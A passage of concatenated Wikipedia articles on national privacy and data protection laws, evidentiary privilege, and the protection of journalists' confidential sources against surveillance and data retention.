of Appeal. InRogers v TVNZ Ltd, the Supreme Court indicated it had some misgivings with how the tort was introduced, but chose not to interfere with it at that stage. Complaints about privacy are considered by thePrivacy Commissioner Federal Republic of Nigeria's constitution offers its constituents the right toprivacyas well as privacy protection. The following can be found in the constitution pertaining to this: "The privacy of citizens, their homes, correspondence, telephone conversations and telegraphic communications is hereby guaranteed and protected".[73]Additionally, as a member of the United Nations, Nigeria is bound by the universal declaration of Human Rights which states in article twelve "No one shall be subjected to arbitrary interference with his privacy, family, home or correspondence, nor to attacks upon his honor and reputation. Everyone has the right to the protection of the law against such interference or attacks".[38]Nigeria is one of the few African countries that is building on the privacy laws. This is evident in the fact that Nine years later in the year 2008, theCybersecurityand Information Protection Agency Bill was passed. This bill is responsible for the creation of the Cybersecurity and Information Protection Agency.[74]This agency is tasked with the job of preventingcyberattacksand regulating the Nigerian information technology industry.[74]Additional laws have been passed that are meant to prevent the disclosure of information without permission and the intercepting of some form of transaction with or without evil intent. In Article III, Section 3, paragraph 1 of the1987 Constitution of the Philippineslets its audience know that "The privacy of communication and correspondence shall be inviolable except upon lawful order of the court, or when public safety or order requires otherwise as prescribed by law".[75]Not only does this country grant theFilipinosthe right to privacy, but it also protects its people's right to privacy by attaching consequences to the violation of it thereof. In the year 2012, the Philippines passed the Republic Act No. 10173, also known as the "Data Privacy Act of 2012".[76]This act extendedprivacyregulations and laws to apply to more than just individual industries. This act also offered protection of data belonging to the people regardless of where it is stored, be it in private spheres or not. In that very same year, the cybercrime prevention law was passed. This law was "intended to protect and safeguard the integrity of computer andcommunications systems" and prevent them from being misused.[77]Not only does the Philippines have these laws, but it has also set aside agents that are tasked with regulating these privacy rules and due ensure the punishment of the violators. Additionally, with the constitution, previous laws that have been passed but that are in violation of the laws above have been said to be void and nullified. Another way this country has shown their dedication in executing this law is extending it to the government sphere as well. Additionally, as a member of the United Nations, the Philippines is bound by theUniversal Declaration of Human Rightswhich states in article two "No one shall be subjected to arbitrary interference with his privacy, family, home or correspondence, nor to attacks upon his honor and reputation. Everyone has the right to the protection of the law against such interference or attacks".[38] Applicable legislation: As a general rule, consent of the individual is required for processing, i.e. obtaining, organizing, accumulating, holding, adjusting (updating, modifying), using, disclosing (including transfer), impersonating, blocking or destroying of his personal data. This rule doesn't apply where such processing is necessary for performance of the contract, to which an individual is a party. Singapore, like other Commonwealth jurisdictions, relies primarily on common law, and the law of confidence is employed for privacy protection cases.[78]For example, privacy can be protected indirectly through various common law torts: defamation, trespass, nuisance, negligence, and breach of confidence.[79]In February 2002, however, the Singaporean government decided that the common law approach was inadequate for their emerging globalized technological economy.[78]Thus, the National Internet Advisory Committee published the Model Data Protection Code for the Private Sector, which set standards for personal data protection and was influenced by the EU Data Protection Directive and the OECD Guidelines on the Protection of Privacy.[78]In the private sector, businesses can still choose to adopt the Model Code, but in 2005 Parliament decided that Singapore needed a more comprehensive legislative privacy framework.[80] In January 2013, Singapore's Personal Data Protection Act 2012 came into effect in three separate but related phases.[citation needed]The phases continued through July 2014 and dealt with the creation of the Personal Data Protection Commission, the national Do Not Call Registry, and general data protection Rules.[citation needed]The Act's general purpose "is to govern the collection, use and disclosure of personal data by organisations" while acknowledging the individual's right to control their personal data and the organizations' legal needs to collect this data.[78]It imposes eight obligations on those organizations that use personal data: consent, purpose limitation, notification, access, correction, accuracy, protection/security, and retention.[81]The Act prohibits transfer of personal data to countries with privacy protection standards that are lower than those outlined in the general data protection rules.[80]The Personal Data Protection Commission is responsible for enforcing the Act, which is based primarily on a complaints-based system.[78]The punishments for violating the Act can include being ordered by the commission to stop collecting and using personal data, to destroy the data, or to pay a penalty of up to $1 million.[78] Singapore has also passed various sector-specific statutes that more indirectly deal with privacy and personal information, including: There are also more specific acts for electronically stored information: TheConstitutionof South Africa guarantees the most general right to privacy for all its citizens. This provides the main protection forpersonal dataprivacy so far. TheProtection of Personal Information Act2013 (POPI) was signed into act, focusing on data privacy and is inspired by other foreign national treaties like the European Union. Minimum requirements are presented in POPI for the act of processing personal data, like the fact that the data subject must provide consent and that the data will be beneficial, and POPI will be harsher when related to cross-border international data transfers, specifically with personal information.[58] The recording of conversations over phone and internet is not allowed without the permission of both parties with theRegulation of Interception of CommunicationsandProvision of Communications Related Act(2002). In addition, South Africa is part of theSouthern African Development Communityand theAfrican Union.[19] In early 2022, Sri Lanka became the first country in South Asia to enact comprehensive data privacy legislation. The Personal Data Protection Act No. 9 of 2022, effective since 19 March 2022, applies to processing within Sri Lanka and extends extraterritorially to controllers or processors offering goods and services to individuals in Sri Lanka and/or monitoring their behavior in the country.[82] TheData Actis the world's first national data protection law and was enacted in Sweden on 11 May 1973.[83][84][85]The law was then superseded on 24 October 1998 by the Personal Data Act (Sw.Personuppgiftslagen) that implemented the 1995 EUData Protection Directive.[86][87][88][89] The main legislation over personal data privacy for the personal and private sector in Switzerland is theSwiss Federal Protection Act,specifically the Data Protection Act, a specific section under the Swiss Federal Protection Act. The Data Protection Act has been enacted since 1992 and is in charge of measuring the consent of sharing of personal data, along with other legislation like the Telecommunication Act and the Unfair Competition Act. The Act generally guides on how to collect, process, store, data, use, disclose, and destruct data. The Data Inspection Board is in charge of overseeing data breaches and privacy enforcement. Personal data must be protected against illegal use by "being processed in good faith and must be proportionate".[58]Also, the reason for the transfer of personal data must be known by the time of data transfer. Data not associated with people (not personal data) is not protected by the Data Protection Act. In the case of data transfer to unsafe data protection countries, these are the major regulations required by the Data Protection Act: Switzerland is a white-listed country, meaning that it is a nation that has proper levels of data protection under the surveillance by theEuropean Commission(EU Commission). Switzerland is not under the EU Data Protection Directive 95/46 EC.[90]However, the data protection regulations are sufficient to meet European Union (EU) regulations without being a member of the EU. In addition, Switzerland is part of the Council of Europe and the Organisation for Economic Cooperation and Development.[19] The Data Inspection Board of Switzerland is a member of the International Conference of Data Protection and Privacy Commissioners, European Data Protection Authorities, the EU Article 29 Working Party, and the Nordic Data Protection Authorities.[19] The right to privacy is not explicitly mentioned in theRepublic of China Constitution, but it can be protected indirectly throughjudicial interpretation. For example, article 12 of the Constitution states "the people shall have freedom of confidentiality of correspondence" while article 10 states "the people shall have freedom of residence and of change of residence."[91]Along with several other articles that assert the Constitution's protection of freedoms and rights of the people, the Grand Justices are able to decide how privacy protection fits into the legal system.[91]The Justices first made reference to privacy being a protected right in the 1992 "Interpretation of Council of Grand Justices No. 293 on Disputes Concerning Debtors' Rights," but it was not directly or explicitly declared to be a right.[91] In 1995, Taiwan passed the Computer-Processed Personal Data Protection Act which was influenced by the OECD Guidelines and enforced by each separate Ministry depending on their industry sector responsibility.[92]It only protected personal information managed by government agencies and certain industries.[70]In 2010, Taiwan enacted the Personal Data Protection Act that laid out more comprehensive guidelines for the public and private sectors and was still enforced by individual Ministries.[92]In the 2010 Act, personal data is protected and defined as any "data which is sufficient to, directly or indirectly, identify that person", and includes data such as name, date of birth, fingerprints, occupation, medical records, and financial status, among many others.[93] A few other administrative laws also deal with communication-specific personal privacy protection: Additionally, chapter 28 of theCriminal Codeoutlines punishments for privacy violations in article 315, sections 315-1 and 315–2. The sections primarily address issues of search and seizure and criminal punishment for wrongful invasion of privacy.[91] Finally, articles 18(I),184(I), and 195(I) of the TaiwaneseCivil Codeaddress the "personality right" to privacy and the right to compensation when one injures the "rights" of another, such as when someone uses another's name illegally.[91] Thailand's unique history of being an authoritarian buffer state during the Cold War and being under the constant threat of acoup d'étatmeans that privacy laws have so far been limited in order to preserve national security and public safety.[94]Thailand uses bureaucratic surveillance to maintain national security and public safety, which explains the 1991 Civil Registration Act that was passed to protect personal data in computerized record-keeping and data-processing done by the government.[94] The legislature passed the Official Information Act 1997 to provide basic data protection by limiting personal data collection and retention in the public sector.[92]It defines personal information in a national context in relation to state agencies.[95]Two communication technology related laws, the Electronic Transactions Act 2001 and the Computer Crime Act 2007, provide some data privacy protection and enforcement mechanisms.[94]Nevertheless, Thailand still lacks legislation that explicitly addresses privacy security.[94] Thus, with the need for a more general and all-encompassing data protection law, the legislature proposed the Personal Data Protection Bill in 2013, which is heavily influenced by the OECD Guidelines and the EU Directive.[94][95]The draft law is still under evaluation and its enactment date is not yet finalized.[95] Privacy anddata protectioninUkraineis mainly regulated by the Law of Ukraine No. 2297-VI 'On Personal Data Protection' enacted on 1 June 2010.[96]On 20 December 2012 legislation was substantially amended. Some general and sector-specific aspects of privacy are regulated by the following acts:[97] As a member of theEuropean Convention on Human Rights, the United Kingdom adheres toArticle 8 of the European Convention on Human Rights, which guarantees a "right to respect for privacy and family life" from state parties, subject to restrictions as prescribed by law andnecessary in a democratic societytowards a legitimate aim. However, there is no independent tort law doctrine which recognises a right to privacy. This has been confirmed on a number of occasions. Processing of personal information is regulated by theData Protection Act 2018, supplementing the EUGeneral Data Protection Regulation, which is still in force (in amended form) after the UK's exit from the EU as "retained EU legislation". TheData Protection Act of 2018is the United Kingdom’s main legislation protecting personal data and how it should be collected, processed, stored and shared. In accordance to this legislature, citizens have rights such as the right to access their personal data, and the right to request their data be deleted under certain circumstances, also known as the "right to be forgotten." The Act also sets out obligations for organizations that handle personal data, including requirements for transparency in data processing, the implementation of appropriate security measures to protect data, and the need for consent from individuals before processing their data. ThePrivacy and Electronic Communications Regulations, established in 2003, gave citizens control in consent and disclosure of information in specific electronic communications including: The goal of the Privacy and Electronic Communications Regulations is to protect individuals’ privacy and control over their electronic communications while promoting responsible and transparent practices by organizations that engage in electronic marketing and in the use of tracking technologies.[98] The United Kingdom General Data Protection Regulation, is the domestic version of the European Union'sGeneral Data Protection Regulation (GDPR), implemented into UK law through the Data Protection Act 2018 and came into effect alongside the EU GDPR in May 2018.[citation needed] UK GDPR governs data protection and privacy within the UK applying to the processing of personal data by organizations operating within the UK. It includes specific provisions tailored to the UK's legal framework and requirements. Key aspects of the UK GDPR include:[99] The UK GDPR aims to ensure that personal data is processed legally, fairly and with full transparency while individuals are given control over the handling of their personal data. For more information about the Privacy Laws in the United Kingdom: For detailed guidance and the latest updates on compliance with United Kingdom privacy laws, businesses and individuals can refer to resources provided by thehttps://ico.org.uk/and stay informed about developments in UK privacy law through expert analyses and updates.[99] The right to privacy is not explicitly stated anywhere in the Bill of Rights. The idea of a right to privacy was first addressed within a legal context in the United States.Louis Brandeis(later a Supreme Court justice) and another young lawyer,Samuel D. Warren II, published an article called "The Right to Privacy" in theHarvard Law Reviewin 1890 arguing that theUnited States Constitutionandcommon lawallowed for the deduction of a general "right to privacy".[100] Their project was never entirely successful, and the renowned tort expert and Dean of the College of Law at University of California, Berkeley,William Lloyd Prosserargued in 1960 that "privacy" was composed of four separate torts, the only unifying element of which was a (vague) "right to be left alone".[101]The four torts were: [106]Public Disclosure of Private Facts or Publicity Given to Private Life is a tort under privacy law that protects individuals from the unauthorized dissemination of private information that is not of public concern. This tort aims to safeguard an individual's right to privacy and prevent unwarranted intrusion into their personal lives.[107] To establish a claim for public disclosure of private facts, the following elements generally need to be proven: One of the central privacy policies concerning minors is theChildren's Online Privacy Protection Act(COPPA), which requires children under the age of thirteen to gain parental consent before putting any personal information online.[108] The Privacy Act of 1974 is foundational, establishing a code of fair information practices that govern the collection, maintenance, use, and dissemination of information about individuals that is maintained in systems of records by federal agencies. This act allows individuals to review and amend their records, ensuring personal information is handled transparently and responsibly by the government.[109] Enacted in 1996, theHealth Insurance Portability and Accountability Act(HIPAA) protects sensitive patient health information from being disclosed without the patient's consent or knowledge. HIPAA sets the standard for protecting sensitive patient data held by health care providers, insurance companies, and their business associates.[110] TheFederal Trade Commissionplays a crucial role in enforcing federal privacy laws that protect consumer privacy and security, particularly in commercial practices. It oversees the enforcement of laws such as theFair Credit Reporting Act' which regulates the collection and use of consumer credit information.[111] Individual states also enact their own privacy laws. TheCalifornia Consumer Privacy Actis one of the most stringent privacy laws in the U.S. It provides California residents with the right to know about the personal data collected about them, the right to delete personal information held by businesses, and the right to opt-out of the sale of their personal information. Businesses must disclose their data collection and sharing practices to consumers and allow consumers to access their data and opt-out if they choose. The Act recently expanded existing consumer rights in the state in 2023, providing citizens the right to reduce the collection of data and correct false information.[112] Enforcement of these laws is specific to the statutes and the authorities responsible. For instance, HIPAA violations can lead to substantial fines imposed by the Department of Health and Human Services, while the Federal Trade Commission handles penalties under consumer protection laws. State laws are enforced by respective state attorneys general or designated state agencies. The privacy laws in the U.S. reflect a complex landscape shaped by sector-specific requirements and state-level variations, illustrating the challenge of protecting privacy in a federated system of government. For additional information on Privacy laws in the United States, see: Recently, a handful of lists and databases are emerging to help risk managers research U.S. State and Federal laws that define liability. They include: To be able to intrude on someone's seclusion, the person must have a "legitimate expectation of privacy" in the physical place or personal affairs intruded upon.[4] To be successful, a plaintiff "must show the defendant penetrated some zone of physical or sensory privacy" or "obtained unwanted access to data" in which the plaintiff had "an objectively reasonable expectation of seclusion or solitude in the place, conversation or data source."[5] For example, a delicatessen employee told co-workers that she had a staph infection in a private manner.[4]The co-workers then informed their manager, who directly contacted the employee's doctor to determine if she actually had a staph infection, because employees in Arkansas with a communicable disease are forbidden from working in the food preparation industry due to transmittable health concerns.[4] The employee with the staph infection sued her employer, the deli, for intruding on her private affairs, as the information she had previously shared had gotten leaked.[4]The court held that the deli manager had not intruded upon the worker's private affairs because the worker had made her staph infection public by telling her two co-workers about it, no longer making it intrusion.[4] The court said: "When Fletcher learned that she had a staph infection, she informed two coworkers of her condition. Fletcher's revelation of private information to coworkers eliminated Fletcher's expectation of privacy by making what was formerly private a topic of office conversation."[4] In determining whether an intrusion is objectively "highly offensive," a court is supposed to examine "all the circumstances of an intrusion, including the motives or justification of the intruder."[118] It is up to the courts to decide whether someone that is considered "offensive" is acceptable based on the intentions when it comes to searching for that specific news. A website may commit a "highly offensive" act by collecting information from website visitors using "duplicitous tactics." A website that violates its own privacy policy does not automatically commit a highly offensive act according to the jury. But the Third Circuit Court of Appeals has held that Viacom's data collection on the Nickelodeon website was highly offensive because the privacy policy may have deceptively caused parents to allow their young children to use Nick.com, thinking it was not collecting their personal information.[119] The First Amendment "does not immunize the press from torts or crimes committed in an effort to gather news." They are still held liable for the news they gather and how they gather it. But the press is given more latitude to intrude on seclusion to gather important information, so many actions that would be considered "highly offensive"[120]if performed by a private citizen may not be considered offensive if performed by a journalist in the "pursuit of a socially or politically important story."[121] (under the paragraph discussing COPPA) In California, theCalifornia Consumer Privacy Act of 2018provides specific regulations for companies collecting consumer data in California organized as particular rights; these include the right to have knowledge about how companies intend to use consumer data, as well as the right to opt-out of its collection and potentially delete this data. The Act recently expanded existing consumer rights in the state in 2023, providing citizens the right to reduce the collection of data and correct false information.[122] Though the right to privacy exists in several regulations, the most effective privacy protections come in the form of constitutional articles of Uzbekistan. Varying aspects of the right to privacy are protected in different ways by different situations.[vague] Vietnam, lacking a general data protection law, relies on Civil Code regulations relating to personal data protection. Specifically, the Code "protects information relating to the private life of a person."[123]The 2006 Law on Information Technology protects personal information, such as name, profession, phone number, and email address, and declares that organizations may only use this information for a "proper purpose". The legislation, however, does not define what qualifies as proper.[123]The 2005 Law on Electronic Transactions protects personal information during electronic transactions by prohibiting organizations and individuals from disclosing "part or all of information related to private and personal affairs ... without prior agreement."[124]The 2010 Law on Protection of Consumers' Rights provides further protection for consumer information, but it does not define the scope of that information or create a data protection authority; additionally, it is only applicable in the private sector.[92] In 2015, the Vietnam legislature introduced the Law on Information Security, which ensures better information safety and protection online and in user's computer software. It took effect on 1 July 2016 and is Vietnam's first overarching data protection legislation.[125] Source[21]
https://en.wikipedia.org/wiki/Privacy_law
In thelaw of evidence, aprivilegeis a rule of evidence that allows the holder of the privilege to refuse to disclose information or provide evidence about a certain subject or to bar such evidence from being disclosed or used in a judicial or other proceeding. There are many such privileges recognised by the judicial system, some stemming from thecommon lawand others fromstatute law. Each privilege has its own rules, which often vary between jurisdictions. One well-known privilege is thesolicitor–client privilege, referred to as theattorney–client privilegein theUnited Statesand as thelegal professional privilegeinAustralia. This protects confidential communications between a client and his or her legal adviser for the dominant purpose of legal advice.[1]The rationale is that clients ought to be able to communicate freely with their lawyers, in order to facilitate the proper functioning of the legal system. Other common forms include privilege against compelledself-incrimination(in other proceedings),without prejudiceprivilege (protecting communications made in the course of negotiations to settle a legal dispute),public interest privilege(formerly Crown privilege, protecting documents for which secrecy is necessary for the proper functioning of government),spousal (marital) privilege,medical professional privilege, andclergy–penitent privilege. In the US, several states have enacted theUniform Mediation Act(UMA) which specifies amediator's privilege with regard to state procedures. In the UK, "mediation privilege" is generally protected, although in the case of Ruttle Plant Hire vDEFRA(2007), anactionbrought to seek to set aside asettlement agreementon the grounds that it was entered into undereconomic duress, there was a call for the mediator to give evidence on her recollection of the mediation process.[2] In the United Kingdom, theRehabilitation of Offenders Act 1974provides that evidence relating to spent convictions (those in respect of which the Act says the convicted person is rehabilitated, generally older and less serious ones) is inadmissible and provides privilege against answering questions relating to such convictions; although some exceptions apply, in particular in criminal proceedings.[3] The effect of the privilege is usually a right on the part of a party or witness to a case, allowing them to refuse to produce evidence in the form of documents or testimony from the person entitled to the privilege. For example, a person can generally prevent their attorney from testifying about the legal relationship between attorney and client, even if the attorney were willing to do so. In this case, the privilege belongs to the client and not the attorney. In a few instances, such as the marital privilege, the privilege is a right held by the potential witness. Thus, if a wife wishes to testify against her husband, she may do so even if he opposes this testimony; however, the wife has the privilege of refusing to testify even if the husband wishes her to do so. On the other hand, the person entitled to a privilege is at liberty towaivethe privilege.
https://en.wikipedia.org/wiki/Privilege_(evidence)
Source protection, sometimes also referred to assource confidentialityor in the U.S. as thereporter's privilege, is a right accorded to journalists under the laws of many countries, as well as underinternational law. It prohibits authorities, including the courts, from compelling a journalist to reveal the identity of an anonymous source for a story. The right is based on a recognition that without a strong guarantee of anonymity, many would be deterred from coming forward and sharing information of public interests with journalists. Regardless of whether the right to source confidentiality is protected by law, the process of communicating between journalists and sources can jeopardize the privacy and safety of sources, as third parties can hack electronic communications or otherwise spy on interactions between journalists and sources.News mediaand their sources have expressed concern over government covertly accessing their private communications.[1]To mitigate these risks, journalists and sources often rely onencryptedmessaging. Journalists rely on source protection to gather and reveal information in thepublic interestfromconfidentialsources. Such sources may require anonymity to protect them from physical, economic or professional reprisals in response to their revelations. There is a strong tradition of legal source protection internationally, in recognition of the function that confidential sources play in facilitating 'watchdog' or 'accountability' journalism. While professional journalistic practice entails multi-sourcing, verification and corroboration, confidential sources are a key component of this practice. Without confidential sources, many acts of investigative story-telling—fromWatergateto the major 2014 investigative journalism projectOffshore Leaksundertaken by theInternational Consortium of Investigative Journalists(ICIJ)[2]—may never have surfaced. Even reporting that involves gathering opinions in the streets, or a background briefing often relies on trust that a journalist respects confidentiality where this is requested.[3] Due to the centrality of communication between journalists and sources to the daily business ofjournalism, the question of whether or not sources can expect to have their identity protected has significant effects on the ability of media to operate and investigate cases.[4]If a potential source can expect to face legal retaliation or other personal harm as a result of talking to a journalist, they may be less willing to talk to the media.[5] Thedigital environmentposes challenges to traditional legal protections for journalists' sources. While protective laws and/or a reporter's commitment shielded the identity of sources in the analogue past, in the age of digital reporting,mass surveillance, mandatory data retention, and disclosure by third party intermediaries, this traditional shield can be penetrated.[3] Technological developments and a change in operational methods of police andintelligence servicesare redefining the legal classification ofprivacyand journalistic privilege internationally.[6]With rapid technological advancement, law enforcement and national security agencies have shifted from a process of detecting crimes already committed, to one of threat prevention in the post-September 11environment. In the digital age, it is not the act of committing (or suspicion of committing) a crime that may result in a person being subject to surveillance, but the simple act of using certain modes of communication—such as mobile technology, email, social networks and the Internet.[6][7] Journalists are now adapting their work in an effort to shield their sources from exposure, sometimes even seeking to avoid electronic devices and communications. The cost of the digital era source protection threat is significant—in terms of digital security tools, training, reversion to more labor-intensive analogue practices, and legal advice. Such tactics may be insufficient if legal protections are weak, anonymity is forbidden,encryptionis disallowed, and sources themselves are unaware of the risks. The impact of these combined factors on the production and scope ofinvestigative journalismbased on confidential sources is significant. Where source protection is compromised, the impacts can include: Scholars,[8]journalism organizations[9]and press freedom advocacy groups[10]have put a lot of effort in defining journalism in a way that it would allow the best possible protection of themselves and their sources. Manystakeholdershave argued in favor of legal protections being defined in connection with 'acts of journalism', rather than through the definition of the professional functions of a journalist. Some countries are broadening the legal definition of 'journalist' to ensure adequate protection forcitizen reporters(working on and offline). This opens up debates about classifying journalists, and even about licensing and registering those who do journalism—debates that are particularly potent where there is a history of controls overpress freedom. Many legal definitions of 'journalist' have been evaluated as overly narrow, as they tend to emphasis official contractual ties to legacy media organizations, may demand a substantial publication record, and/or require significant income to be derived from the practice of journalism. This leaves confidential sources relied upon by bloggers and citizen journalists largely unprotected, because these producers of journalism are not recognized as 'proper journalists'. Such definitions also exclude the growing group of academic writers and journalism students, lawyers, human rights workers and others, who produce journalism online, including investigative journalism. This has bearing on a controversy in 2015 in whichAmnesty Internationalobjected to having been a subject of surveillance[11] In December 2013, theUnited Nations General Assemblyadopted a resolution which outlined a broad definition of journalistic actors that acknowledged that: "...journalism is continuously evolving to include inputs from media institutions, private individuals and a range of organizations that seek, receive and impart information and ideas of all kinds, online as well as offline, in the exercise of freedom of opinion and expression".[12] In 2014, the Intergovernmental Council of UNESCO'sInternational Program for the Development of Communications(IPDC) welcomed the UNESCO Director-General's Report on theSafety of Journalistsand the Danger ofImpunity, which uses the term 'journalists' to designate the range of "journalists, media workers and social media producers who generate a significant amount of public-interest journalism".[13] The Arabic Media Internet Network'sDauoud Kuttabdoes not want to limit entitlement to source protection to recognized journalists, but to extend it to citizens as well.[14]Egyptian Media Studies Professor Rasha Abdullah said that source protection needs to be accessible to a broad range of communications actors: "It should apply to anyone who has information to expose, particularly in the age of digital media".[15]For Arab Reporters for Investigative Journalism's (ARIJ) Rana Sabbagh, "There is a difference between reporting the news, writing an editorial, and being an activist".[16] United Statesmedia lawyer Charles Tobin is also in favor of a broad definition of journalism as a response to the rise of citizen journalists andbloggers.[17]In 2013, the USA'sSociety of Professional Journalistspassed a unanimous motion that "strongly rejects any attempts to define a journalist in any way other than as someone who commits acts of journalism."[9] Moving the framework to a protection of 'acts of journalism' rather than limiting it to the work of professional journalists is a conceptual shift, according to Stearns in a 2013 report.[10] In 2007, Banisar noted that: "A major recent concern ... is the adoption of newanti terrorism lawsthat allow for access to records and oblige assistance. There are also problems in many countries with searches ofnewsroomsand with broadly defined state secrets acts which criminalize journalists who publish leaked information".[18] The problem has grown in the intervening years, as a parallel to digital development, and occurs where it is unchecked by measures designed to preserve fundamental rights to freedom of expression and privacy, as well as accountability and transparency. In practice, Campbell considers that this leads to what can be identified as a 'trumpingeffect', where national security and anti-terrorism legislation effectively take precedence over legal and normative protections for confidential journalistic sources.[19]The classification of information as being protected by national security or anti-terrorism legislation has the effect of increasing the reluctance of sources to come forward.[3] A 2008Council of Europe(CoE) report stated: "Terrorismis often used as a talisman to justify stifling dissenting voices in the way that calling someone acommunistorcapitalistwere used during theCold War".[7]According to the COE report, following the 2001 terrorist attacks, many European countries adopted new laws or expanded the use of old laws to monitor communications.[20] Gillian Phillips, Director of Editorial Legal Services ofThe Guardianhas specifically referenced the implications of governments invoking national security and anti-terrorism measures that interfere withprotections for journalistsand their sources. Calls for unlimited monitoring and use of modern surveillance technologies to access all citizens' data, directly challenge journalists' rights to protect their confidential sources, she said.[21]A report by The Guardian in 2015, based on files leaked byEdward Snowden, highlighted the potential controversy in this area. It stated that aUnited KingdomGovernment Communications Headquarters (GCHQ)information securityassessment had listed "investigative journalists" alongside terrorists andhackersin a threat hierarchy.[22] Fuchs,[23]Eubanks,[24]and Giroux[25]have warned that surveillance is a broader problem than the impingement of individual privacy. Andrejevic (2014) has argued that it represents a fundamental alteration to the power dynamics of society: "...Surveillance should be understood as referring to forms of monitoring deeply embedded in structural conditions of asymmetrical power relations that underwrite domination and exploitation."[26] Mass surveillance can be defined as the broad, arbitrary monitoring of an entire or substantial fraction of a population.[27]According to former United Nations Special Rapporteur on the Promotion and Protection of the Right to Freedom of Expression and Opinion,Frank La Rue, States can achieve almost complete control oftelecommunicationsand online communications "...by placing taps on thefiber-opticcables, through which the majority of digital communication information flows, and applying word, voice andspeech recognition...".[28] A report of the United Nations Special Rapporteur on the Promotion and Protection of Human Rights and Fundamental Freedoms while Countering Terrorism,Ben Emmerson, has outlined that States can gain access to the telephone and email content of an effectively unlimited number of users and maintain an overview of Internet activity associated with particular websites. "All of this is possible without any prior suspicion related to a specific individual or organization. The communications of literally everyInternetuser are potentially open for inspection by intelligence andlaw enforcement agenciesin the States concerned".[29] There is also concern about the extent oftargeted surveillance, according to Emmerson's report: "Targeted surveillance...enables intelligence and law enforcement agencies to monitor the online activity of particular individuals, to penetrate databases and cloud facilities, and to capture the information stored on them".[29] In 2013, the Monk School of Global Affairs' Citizen Lab research group at theUniversity of Torontodiscovered command and control servers forFinFisher software(also known as FinSpy) backdoors, in a total of 25 countries, including 14 countries inAsia, nine inEuropeandNorth America, one inLatin America and the Caribbean, and one inAfrica.[30]This software is exclusively sold togovernmentsand law enforcement agencies.[31] A 2008 Council of Europe report detailed what it described as a "worrying trend in the use of both authorized and unauthorized electronic surveillance to monitorjournalistsby governments and private parties to track their activities and identify their sources". According to the report, most such incidents are not related tocountering terrorismbut they are authorized under the broad powers of national laws or undertaken illegally, in an attempt to identify the sources of journalistic information.[7] These laws expand surveillance in a number of ways, according to the CoE study, such as: According to Polish law academic Jan Podkowik (2014), surveillance undertaken without a journalist's consent should be considered as an act of interference with the protection granted by Article 10 of theEuropean Convention on Human Rights. He proposed in a 2014 paper that interference with journalistic confidentiality by means of secret surveillance should be recognized at least as equally onerous as searches of a home or a workplace. "... it seems that in the digital era, it is necessary to redefine the scope of the protection of journalistic privilege and to include in that scope all the data acquired in the process of communication, preparation, processing or gathering of information that would enable the identification of an informant," Podkowik wrote.[32] Compounding the impacts of surveillance on source protection and confidential source-dependent journalism globally is the interception, capture and long term storage of data by third party intermediaries. IfISPs,search engines, telecommunication technologies, andsocial mediaplatforms, for example, can be compelled to produce electronic records (stored for increasingly lengthy periods under mandatory data retention laws) that identify journalists' sources, then legal protections that shield journalists from disclosing confidential sources may be undercut by backdoor access to the data.[33] A 2014 United NationsOffice of the High Commissioner for Human RightsReport, Theright to privacyin the Digital Age concludes that there is a pattern of "...increasing reliance of Governments onprivate sector actorsto retain data 'just in case' it is needed for government purposes. Mandatory third-party data retention—a recurring feature of surveillance regimes in many States, where Governments require telephone companies and internet service providers to storemetadataabout their customers' communications and location for subsequent law enforcement and intelligence agency access—appears neither necessary nor proportionate".[34] States are introducing mandatory data retention laws. Such laws require telecommunications and Internet Service Providers to preserve communications data for inspection and analysis, according to a report of the Special Rapporteur on Promotion and Protection of Human Rights and Fundamental Freedoms while Countering Terrorism.[29]In practice, this means that data on individuals' telecommunication and Internet transactions are collected and stored even when no suspicion of crime has been raised.[35] Some of the data collected under these policies is known as metadata. Metadata is data that defines and describes other data. For theInternational Organization for Standardizationstandard, metadata is defined as data that defines and describes other data and processes.[36]As theElectronic Frontier Foundation'sPeter Eckersleyhas put it, "Metadata is information about what communications you send and receive, who you talk to, where you are when you talk to them, the length of your conversations, what kind of device you were using and potentially other information, like the subject line of your emails".[37]Metadata may also includegeolocationinformation. Advocates of long-term metadata retention insist that there are no significant privacy or freedom of expression threats.[38]Even when journalistsencryptthe content, they may neglect the metadata, meaning they still leave behind a digital trail when they communicate with their sources. This data can easily identify a source, and safeguards against its illegitimate use are frequently limited, or non-existent.[39] In an era where citizens and other social communicators have the capacity to publish directly to their own audiences, and those sharing information in the public interest are recognized as legitimate journalistic actors by theUnited Nations, the question, forJulie Posettiis to know to whom source protection laws should be applied. On the one hand, broadening the legal definition of 'journalist' to ensure adequate protection forcitizen reporters(working on and offline) is desirable, and case law is catching up gradually on this issue of redefinition. On the other hand, it opens up debates about licensing and registering those who do journalism and who wish to be recognized for protection of their sources.[3] Female journalistsworking in the context of reporting conflict and organized crime are particularly vulnerable to physical attacks, includingsexual assault, andharassment. In some contexts, their physical mobility may be restricted due to overt threats to their safety, or as a result of cultural prohibitions on women's conduct in public, including meeting privately with male sources. For theWorld Trends Report, women journalists need to be able to rely on secure non-physical means of communication with their sources. Women sources may face the same physical risks outlined above—especially if their journalistic contact is male and/or they experience cultural restrictions, or they are working inconflict zones. Additionally, female confidential sources who aredomestic abusevictims may be physically unable to leave their homes, and therefore be reliant ondigital communications.[40][3] Women journalistsneed to be able to rely on secure digital communications to ensure that they are not at increased risk in conflict zones, or when working on dangerous stories, such as those aboutcorruptionandcrime. The ability to covertly intercept and analyze journalistic communications with sources increases the physical risk to both women journalists and their sources in such contexts.Encryptedcommunications and other defensive measures are therefore of great importance to ensure that their movements are not tracked and the identity of the source remains confidential.[3] Journalists and sources using the Internet or mobile apps to communicate face greater risk of gendered harassment and threats of violence. These risks need to be understood and mitigated to avoid further chilling women's involvement in journalism—as practitioners or sources.[3] "There is widespread recognition in international agreements, case law and declarations that protection of journalists' sources [are] a crucial aspect of freedom of expression that should be protected by all nations"[18] International Organizationssuch as the United Nations (UN) orUNESCO,Organisation of American States,African Union,Council of Europe, and theOrganization for Security and Co-operation in Europe(OSCE) have specifically recognized journalists' right to protect their sources. TheEuropean Court of Human Rights(ECtHR) has found in several cases that it is an essential component of freedom of expression. April 2013 draft report published: "CleanGovBiz Integrity in Practice, Investigative Media" argued that forcing a journalist to reveal a source in such cases would be a short sighted approach in many cases: "...once a corruption case has been brought to light by a journalist, law enforcement has an incentive to discover the anonymous source(s). While the source might indeed be valuable for the case in question either by providing additional information or through being a witness in court forcing the journalist to reveal the source would often be short-sighted."[59] In Africa, theAfrican Commission on Human and Peoples' Rightshas adopted aDeclaration of Principles on Freedom of Expression in Africawhich includes a right to protection of sources under Principle XV.[60] InAfrica, there exists a relatively strong recognition of the right of journalists to protect their sources, at national, sub-regional as well as continental levels. However, and by and large, this 